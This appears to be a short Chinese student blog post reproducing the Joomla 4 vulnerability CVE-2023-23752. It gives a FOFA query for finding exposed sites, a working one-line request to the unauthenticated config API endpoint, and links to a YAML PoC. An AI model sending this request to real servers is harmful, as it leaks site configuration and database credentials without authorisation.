一、漏洞原理
因为我也只是个网安新手,还在上学,所以这里附上大佬们的分析
https://www.ddosi.org/cve-2023-23752/
二、漏洞复现
1.fofa语句
body=“Joomla! 4”
2.poc
https://xx.xx.xx/api/index.php/v1/config/application?public=true
3.结果![请添加图片描述](https://img-blog.csdnimg.cn/6356ea59c1714161abb9d7d01cf44d19.jpeg)
POC
目前找到的poc是yaml格式的
https://github.com/Saboor-Hakimi/CVE-2023-23752